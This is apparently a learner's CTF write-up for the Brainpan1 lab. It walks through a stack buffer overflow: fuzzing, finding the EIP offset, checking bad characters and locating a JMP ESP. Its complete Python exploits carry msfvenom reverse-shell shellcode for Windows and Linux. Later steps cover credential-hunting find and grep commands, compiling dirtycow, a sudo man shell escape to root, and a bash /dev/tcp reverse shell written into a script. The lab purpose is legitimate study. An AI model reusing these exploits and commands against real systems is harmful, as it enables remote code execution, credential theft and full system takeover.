Brainpan1 (Buffer Overflow with Immunity Debugger)

buffer overflow of an executable. You can use the BOF windows machine

we found the exe

Buffer Overflow:

open immunity debugger as admin

file >open/attach > the exe you want to find the buffer overflow in

hit play to run the application (if you used open not attach)

make a fuzzer on Kali:

mousepad fuzzer.py

my fuzzer for this (a program that asks for input then you hit enter)

import sys, socket
from time import sleep

buffer = "A" * 100

while True:
	try:
		payload = buffer + '\r\n'
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect(('192.168.218.129',9999))
		print("[+] Sending the payload...\n"+str(len(buffer)))
		s.send((payload.encode()))
		s.close()
		sleep(1)
		buffer = buffer + "A" * 100
	except:
		print("The fuzzing crashed at %s bytes" % str(len(buffer)))
		sys.exit()

run it:

python3 fuzzer.py

in immunity: use View > CPU > Maximize

find the EIP (the pointer). We want to control the pointer to make it execute something malicious.

it crashed at 1000

reopen immunity:

use script to create a payload:

msf-pattern_create -l 1000

edit the fuzz again with the 1000 payload:

mousepad fuzzmsf.py

import sys, socket
from time import sleep
	
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"

print("Sending payload...")
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.218.129',9999))
s.send((payload.encode()))
s.close()

take note of the EIP address:

35724134

create new script:

msf-pattern_offset -l 1000 -q 35724134

exact offset at 524!

that means that the EIP is at the 525th byte.

double check that this is right:

send A’s until the EIP then replace EIP with BBBB:

import sys, socket
from time import sleep
	
buffer = "A" * 524 + "B" * 4

print("Sending payload...")
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.218.129',9999))
s.send((payload.encode()))
s.close()

EIP comes back to:

42424242

which means we replace it with B’s

find bad characters:

Google badchars and get the github Embed GitHub

badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

make a script with the bad characters to find the bad characters:

import sys, socket
from time import sleep
	
buffer = "A" * 524 + "B" * 4

badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

print("Sending payload...")
payload = buffer + badchars + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.218.129',9999))
s.send((payload.encode()))
s.close()

once you run it, go into immunity debugger and:

go to ESP, right lick, Follow in Dump

The hex should be 01, 02, 03, etc in order until FF (like the payload we have up ^). Any bad characters would show up as 00 in the dump. You can remove and retest until you have all the bad characters identified.

example output no bad characters:

Address      Hex dump                                      ASCII
0022FCE0     01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  ..............
0022FCF0     10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E  ..............
0022FD00     1F 20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D  . !"#$%&'()*+,
0022FD10     2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B 3C  -./0123456789:;<
0022FD20     3D 3E 3F 40 41 42 43 44 45 46 47 48 49 4A 4B  =>?@ABCDEFGHIJK
0022FD30     4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A  LMNOPQRSTUVWXYZ
0022FD40     5B 5C 5D 5E 5F 60 61 62 63 64 65 66 67 68 69  [\]^_`abcdefghi
0022FD50     6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78  jklmnopqrstuvwxyz
0022FD60     79 7A 7B 7C 7D 7E 7F 80 81 82 83 84 85 86 87  yz{|}~.......
0022FD70     88 89 8A 8B 8C 8D 8E 8F 90 91 92 93 94 95 96  ................
0022FD80     97 98 99 9A 9B 9C 9D 9E 9F A0 A1 A2 A3 A4 A5  ................
0022FD90     A6 A7 A8 A9 AA AB AC AD AE AF B0 B1 B2 B3 B4  ................
0022FDA0     B5 B6 B7 B8 B9 BA BB BC BD BE BF C0 C1 C2 C3  ................
0022FDB0     C4 C5 C6 C7 C8 C9 CA CB CC CD CE CF D0 D1 D2  ................
0022FDC0     D3 D4 D5 D6 D7 D8 D9 DA DB DC DD DE DF E0 E1  ................
0022FDD0     E2 E3 E4 E5 E6 E7 E8 E9 EA EB EC ED EE EF F0  ................
0022FDE0     F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF  ................

example character if x80 was bad:

Address      Hex dump                                      ASCII
0022FCE0     01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  ..............
0022FCF0     10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E  ..............
0022FD00     1F 20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D  . !"#$%&'()*+,
0022FD10     2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B 3C  -./0123456789:;<
0022FD20     3D 3E 3F 40 41 42 43 44 45 46 47 48 49 4A 4B  =>?@ABCDEFGHIJK
0022FD30     4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A  LMNOPQRSTUVWXYZ
0022FD40     5B 5C 5D 5E 5F 60 61 62 63 64 65 66 67 68 69  [\]^_`abcdefghi
0022FD50     6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78  jklmnopqrstuvwxyz
0022FD60     79 7A 7B 7C 7D 7E 7F 00 01 02 03 04 05 06 07  yz{|}~........
0022FD70     08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16  ................
0022FD80     17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25  .......... !"#$%
0022FD90     26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34  &'()*+,-./012345
0022FDA0     35 36 37 38 39 3A 3B 3C 3D 3E 3F 40 41 42 43  6789:;<=>?@ABCDEF
0022FDB0     44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52  GHIJKLMNOPQR
0022FDC0     53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 61  STUVWXYZ[\]^_`
0022FDD0     62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70  abcdefghijklmnopq
0022FDE0     71 72 73 74 75 76 77 78 79 7A 7B 7C 7D 7E 7F  rstuvwxyz{|}~.

It shows as 00 instead of 80 so we know we need to remove it and retest!

Mona in Immunity Debugger:

at the bottom of immunity debugger, type:

!mona modules

to check for protections.

brainpan here has all False for all protections.

find a return address:

!mona find -s "\xff\xe4" -m brainpan.exe

those hexes are jmp esp instructions:

the one pointer found:

311712f3

you can find it in the program (is this necessary?):

hit the black → next to play and type that number until it takes you there

we have that jmp esp in it. We can set a breakpoint by hitting F2

make a script:

import sys, socket
from time import sleep
	
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" #b is for encoding

print("Sending payload...")
payload = buffer + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.218.129',9999))
s.send(payload)
s.close()

we type the pointer address backwards so instead of the logical \x31\x17 you do what’s in the code! (this is little endian)

this code is also doing the encoding manually instead of using python encode. Could use this if there are issues with the characters being sent!

we hit the breakpoint on brainpan at the address we specified. That means what we’re doing is working. Now it’s time to make a payload!

run the program and go to Kali:

we use msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.218.128 LPORT=7777 -b "\x00" -f c

we’re setting LHOST (kali) and port, then we’re identifying bad characters with -b (x00 is always a bad character), then -f c

payload generated:

"\xb8\xf3\x2c\xb7\xc3\xd9\xc1\xd9\x74\x24\xf4\x5b\x2b\xc9"
"\xb1\x52\x83\xeb\xfc\x31\x43\x0e\x03\xb0\x22\x55\x36\xca"
"\xd3\x1b\xb9\x32\x24\x7c\x33\xd7\x15\xbc\x27\x9c\x06\x0c"
"\x23\xf0\xaa\xe7\x61\xe0\x39\x85\xad\x07\x89\x20\x88\x26"
"\x0a\x18\xe8\x29\x88\x63\x3d\x89\xb1\xab\x30\xc8\xf6\xd6"
"\xb9\x98\xaf\x9d\x6c\x0c\xdb\xe8\xac\xa7\x97\xfd\xb4\x54"
"\x6f\xff\x95\xcb\xfb\xa6\x35\xea\x28\xd3\x7f\xf4\x2d\xde"
"\x36\x8f\x86\x94\xc8\x59\xd7\x55\x66\xa4\xd7\xa7\x76\xe1"
"\xd0\x57\x0d\x1b\x23\xe5\x16\xd8\x59\x31\x92\xfa\xfa\xb2"
"\x04\x26\xfa\x17\xd2\xad\xf0\xdc\x90\xe9\x14\xe2\x75\x82"
"\x21\x6f\x78\x44\xa0\x2b\x5f\x40\xe8\xe8\xfe\xd1\x54\x5e"
"\xfe\x01\x37\x3f\x5a\x4a\xda\x54\xd7\x11\xb3\x99\xda\xa9"
"\x43\xb6\x6d\xda\x71\x19\xc6\x74\x3a\xd2\xc0\x83\x3d\xc9"
"\xb5\x1b\xc0\xf2\xc5\x32\x07\xa6\x95\x2c\xae\xc7\x7d\xac"
"\x4f\x12\xd1\xfc\xff\xcd\x92\xac\xbf\xbd\x7a\xa6\x4f\xe1"
"\x9b\xc9\x85\x8a\x36\x30\x4e\x75\x6e\xe0\x0e\x1d\x6d\x14"
"\x11\xbf\xf8\xf2\x47\x2f\xad\xad\xff\xd6\xf4\x25\x61\x16"
"\x23\x40\xa1\x9c\xc0\xb5\x6c\x55\xac\xa5\x19\x95\xfb\x97"
"\x8c\xaa\xd1\xbf\x53\x38\xbe\x3f\x1d\x21\x69\x68\x4a\x97"
"\x60\xfc\x66\x8e\xda\xe2\x7a\x56\x24\xa6\xa0\xab\xab\x27"
"\x24\x97\x8f\x37\xf0\x18\x94\x63\xac\x4e\x42\xdd\x0a\x39"
"\x24\xb7\xc4\x96\xee\x5f\x90\xd4\x30\x19\x9d\x30\xc7\xc5"
"\x2c\xed\x9e\xfa\x81\x79\x17\x83\xff\x19\xd8\x5e\x44\x29"
"\x93\xc2\xed\xa2\x7a\x97\xaf\xae\x7c\x42\xf3\xd6\xfe\x66"
"\x8c\x2c\x1e\x03\x89\x69\x98\xf8\xe3\xe2\x4d\xfe\x50\x02"
"\x44";

script (add the b’s in front of the quotes since python encoding was funky):

import sys, socket
from time import sleep
	
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32 #b is for encoding x90 is no operations, it is used for some padding
payload2 = (b"\xb8\xf3\x2c\xb7\xc3\xd9\xc1\xd9\x74\x24\xf4\x5b\x2b\xc9"
b"\xb1\x52\x83\xeb\xfc\x31\x43\x0e\x03\xb0\x22\x55\x36\xca"
b"\xd3\x1b\xb9\x32\x24\x7c\x33\xd7\x15\xbc\x27\x9c\x06\x0c"
b"\x23\xf0\xaa\xe7\x61\xe0\x39\x85\xad\x07\x89\x20\x88\x26"
b"\x0a\x18\xe8\x29\x88\x63\x3d\x89\xb1\xab\x30\xc8\xf6\xd6"
b"\xb9\x98\xaf\x9d\x6c\x0c\xdb\xe8\xac\xa7\x97\xfd\xb4\x54"
b"\x6f\xff\x95\xcb\xfb\xa6\x35\xea\x28\xd3\x7f\xf4\x2d\xde"
b"\x36\x8f\x86\x94\xc8\x59\xd7\x55\x66\xa4\xd7\xa7\x76\xe1"
b"\xd0\x57\x0d\x1b\x23\xe5\x16\xd8\x59\x31\x92\xfa\xfa\xb2"
b"\x04\x26\xfa\x17\xd2\xad\xf0\xdc\x90\xe9\x14\xe2\x75\x82"
b"\x21\x6f\x78\x44\xa0\x2b\x5f\x40\xe8\xe8\xfe\xd1\x54\x5e"
b"\xfe\x01\x37\x3f\x5a\x4a\xda\x54\xd7\x11\xb3\x99\xda\xa9"
b"\x43\xb6\x6d\xda\x71\x19\xc6\x74\x3a\xd2\xc0\x83\x3d\xc9"
b"\xb5\x1b\xc0\xf2\xc5\x32\x07\xa6\x95\x2c\xae\xc7\x7d\xac"
b"\x4f\x12\xd1\xfc\xff\xcd\x92\xac\xbf\xbd\x7a\xa6\x4f\xe1"
b"\x9b\xc9\x85\x8a\x36\x30\x4e\x75\x6e\xe0\x0e\x1d\x6d\x14"
b"\x11\xbf\xf8\xf2\x47\x2f\xad\xad\xff\xd6\xf4\x25\x61\x16"
b"\x23\x40\xa1\x9c\xc0\xb5\x6c\x55\xac\xa5\x19\x95\xfb\x97"
b"\x8c\xaa\xd1\xbf\x53\x38\xbe\x3f\x1d\x21\x69\x68\x4a\x97"
b"\x60\xfc\x66\x8e\xda\xe2\x7a\x56\x24\xa6\xa0\xab\xab\x27"
b"\x24\x97\x8f\x37\xf0\x18\x94\x63\xac\x4e\x42\xdd\x0a\x39"
b"\x24\xb7\xc4\x96\xee\x5f\x90\xd4\x30\x19\x9d\x30\xc7\xc5"
b"\x2c\xed\x9e\xfa\x81\x79\x17\x83\xff\x19\xd8\x5e\x44\x29"
b"\x93\xc2\xed\xa2\x7a\x97\xaf\xae\x7c\x42\xf3\xd6\xfe\x66"
b"\x8c\x2c\x1e\x03\x89\x69\x98\xf8\xe3\xe2\x4d\xfe\x50\x02"
b"\x44")

print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.218.129',9999))
s.send(payload)
s.close()

set a nc listener on 7777

run it with the program running on the computer and you get shell

now we can do this on the website by changing the msfvenom LHOST to tun0 and target address to the website:

msfvenom -p windows/shell_reverse_tcp LHOST=10.6.62.12 LPORT=7777 -b "\x00" -f c

script:

import sys, socket
from time import sleep
	
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32 #b is for encoding x90 is no operations, it is used for some padding
payload2 = (b"\xda\xd9\xb8\xcd\xfc\xd8\x23\xd9\x74\x24\xf4\x5e\x33\xc9"
b"\xb1\x52\x31\x46\x17\x83\xc6\x04\x03\x8b\xef\x3a\xd6\xef"
b"\xf8\x39\x19\x0f\xf9\x5d\x93\xea\xc8\x5d\xc7\x7f\x7a\x6e"
b"\x83\x2d\x77\x05\xc1\xc5\x0c\x6b\xce\xea\xa5\xc6\x28\xc5"
b"\x36\x7a\x08\x44\xb5\x81\x5d\xa6\x84\x49\x90\xa7\xc1\xb4"
b"\x59\xf5\x9a\xb3\xcc\xe9\xaf\x8e\xcc\x82\xfc\x1f\x55\x77"
b"\xb4\x1e\x74\x26\xce\x78\x56\xc9\x03\xf1\xdf\xd1\x40\x3c"
b"\xa9\x6a\xb2\xca\x28\xba\x8a\x33\x86\x83\x22\xc6\xd6\xc4"
b"\x85\x39\xad\x3c\xf6\xc4\xb6\xfb\x84\x12\x32\x1f\x2e\xd0"
b"\xe4\xfb\xce\x35\x72\x88\xdd\xf2\xf0\xd6\xc1\x05\xd4\x6d"
b"\xfd\x8e\xdb\xa1\x77\xd4\xff\x65\xd3\x8e\x9e\x3c\xb9\x61"
b"\x9e\x5e\x62\xdd\x3a\x15\x8f\x0a\x37\x74\xd8\xff\x7a\x86"
b"\x18\x68\x0c\xf5\x2a\x37\xa6\x91\x06\xb0\x60\x66\x68\xeb"
b"\xd5\xf8\x97\x14\x26\xd1\x53\x40\x76\x49\x75\xe9\x1d\x89"
b"\x7a\x3c\xb1\xd9\xd4\xef\x72\x89\x94\x5f\x1b\xc3\x1a\xbf"
b"\x3b\xec\xf0\xa8\xd6\x17\x93\xdc\x20\x29\x6f\x89\x2e\x55"
b"\x71\x28\xa6\xb3\xe7\xba\xee\x6c\x90\x23\xab\xe6\x01\xab"
b"\x61\x83\x02\x27\x86\x74\xcc\xc0\xe3\x66\xb9\x20\xbe\xd4"
b"\x6c\x3e\x14\x70\xf2\xad\xf3\x80\x7d\xce\xab\xd7\x2a\x20"
b"\xa2\xbd\xc6\x1b\x1c\xa3\x1a\xfd\x67\x67\xc1\x3e\x69\x66"
b"\x84\x7b\x4d\x78\x50\x83\xc9\x2c\x0c\xd2\x87\x9a\xea\x8c"
b"\x69\x74\xa5\x63\x20\x10\x30\x48\xf3\x66\x3d\x85\x85\x86"
b"\x8c\x70\xd0\xb9\x21\x15\xd4\xc2\x5f\x85\x1b\x19\xe4\xb5"
b"\x51\x03\x4d\x5e\x3c\xd6\xcf\x03\xbf\x0d\x13\x3a\x3c\xa7"
b"\xec\xb9\x5c\xc2\xe9\x86\xda\x3f\x80\x97\x8e\x3f\x37\x97"
b"\x9a")

print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.223.74',9999)) #change target IP here
s.send(payload)
s.close()

we get shell!

ls doesn’t work. is it windows?:

dir

it’s a windows, but we have linux file system. It’s a hybrid

if we go to /bin, we can use some of the linux commands

how do we just migrate to a linux shell?

restart the machine

while it’s deploying, make a new linux shell:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.6.62.12 LPORT=7777 -b "\x00" -f c

import sys, socket
from time import sleep
	
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32 #b is for encoding x90 is no operations, it is used for some padding
payload2 = (b"\xdb\xdf\xbe\x40\x25\xab\x65\xd9\x74\x24\xf4\x5a\x31\xc9"
b"\xb1\x12\x83\xea\xfc\x31\x72\x13\x03\x32\x36\x49\x90\x83"
b"\xe3\x7a\xb8\xb0\x50\xd6\x55\x34\xde\x39\x19\x5e\x2d\x39"
b"\xc9\xc7\x1d\x05\x23\x77\x14\x03\x42\x1f\xad\xf5\x8a\xd3"
b"\xd9\xfb\xf2\xf5\x78\x75\x13\xb9\x1d\xd5\x85\xea\x52\xd6"
b"\xac\xed\x58\x59\xfc\x85\x0c\x75\x72\x3d\xb9\xa6\x5b\xdf"
b"\x50\x30\x40\x4d\xf0\xcb\x66\xc1\xfd\x06\xe8")

print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.28.203',9999)) #change target IP here
s.send(payload)
s.close()

we get linux shell!

get a tty on bash:

python -c 'import pty; pty.spawn("/bin/bash")'

how to completely upgrade like full access with tab auto complete:

ctrl+z
stty -raw echo; fg
reset
#if prompted fot Terminal type (I wasn't)
xterm

do the enums:

linpeas found dirtycow

compile:

gcc -pthread dirtycow.c -o dirtycow -lcrypt

sudo -l
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
history
find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
dpkg -l | grep nginx
getcap -r / 2>/dev/null
env
ls -la

WHAT I MISSED:

being able to run manual and it giving us the man page for the commands, means sudo to man which we can find on GTFOBins

man | GTFOBins

sudo -l we can run something as sudo and it lets us do manual for any command:

sudo /home/anansi/bin/anansi_util manual ls

opens the ls manual

how to get root with it:

in the manual page:

!/bin/bash

we get root!

this is called shell escape squence

checksrv.sh can get us shell?

edit it with echo:

echo "bash -i >& /dev/tcp/10.6.62.12/5555 0>&1" > checksrv.sh

no permission